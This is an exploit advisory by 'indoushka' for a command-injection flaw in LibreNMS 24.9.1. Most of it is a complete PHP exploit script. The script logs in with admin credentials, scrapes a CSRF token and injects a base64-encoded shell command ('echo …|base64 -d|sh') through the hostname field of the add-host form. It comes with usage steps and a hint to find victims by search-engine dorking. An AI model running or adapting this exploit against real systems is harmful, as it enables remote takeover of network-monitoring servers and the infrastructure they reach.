=============================================================================================================================================
| # Title     : LibreNMS 24.9.1 PHP Code Injection Vulnerability                                                                            |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://www.librenms.org/                                                                                                   |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] LibreNMS vulnerability allows remote command execution (RCE).
 
[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] SeT target  = Line : 89

[+] PayLoad :

<?php

class LibreNMSExploit {
    private $target;
    private $username;
    private $password;
    private $path;
    private $wait_time;
    private $cookie;

    public function __construct($target, $username, $password, $path = '/opt/librenms', $wait_time = 315) {
        $this->target = rtrim($target, '/');
        $this->username = $username;
        $this->password = $password;
        $this->path = $path;
        $this->wait_time = $wait_time;
        $this->cookie = tempnam(sys_get_temp_dir(), 'cookie_');
    }

    private function request($method, $uri, $data = [], $headers = []) {
        $url = "$this->target/$uri";
        $ch = curl_init();
        
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_COOKIEJAR, $this->cookie);
        curl_setopt($ch, CURLOPT_COOKIEFILE, $this->cookie);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, strtoupper($method));

        if (!empty($data)) {
            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
        }

        if (!empty($headers)) {
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        }

        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    private function getCsrfToken() {
        $response = $this->request('GET', 'login');
        preg_match('/<meta name="csrf-token" content="(.*?)"/', $response, $matches);
        return $matches[1] ?? null;
    }

    public function login() {
        $token = $this->getCsrfToken();
        if (!$token) {
            die("Failed to get CSRF token\n");
        }

        $response = $this->request('POST', 'login', [
            'username' => $this->username,
            'password' => $this->password,
            '_token'   => $token
        ]);

        return strpos($response, 'Devices') !== false;
    }

    public function executeCommand($command) {
        $payload = base64_encode($command);
        $hostPayload = ";echo $payload|base64 -d|sh;";
        
        $token = $this->getCsrfToken();
        if (!$token) {
            die("Failed to get CSRF token\n");
        }
        
        $this->request('POST', 'addhost', [
            '_token'    => $token,
            'hostname'  => $hostPayload,
            'snmp'      => 'on',
            'snmpver'   => 'v2c',
            'port'      => '',
            'transport' => 'udp',
            'force_add' => 'on'
        ]);
        
        echo "Payload sent, waiting for execution...\n";
        sleep($this->wait_time);
    }
}

// Usage
$exploit = new LibreNMSExploit('http://target.com', 'admin', 'password');
if ($exploit->login()) {
    echo "Login successful!\n";
    $exploit->executeCommand('id');
} else {
    echo "Login failed!\n";
}

?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================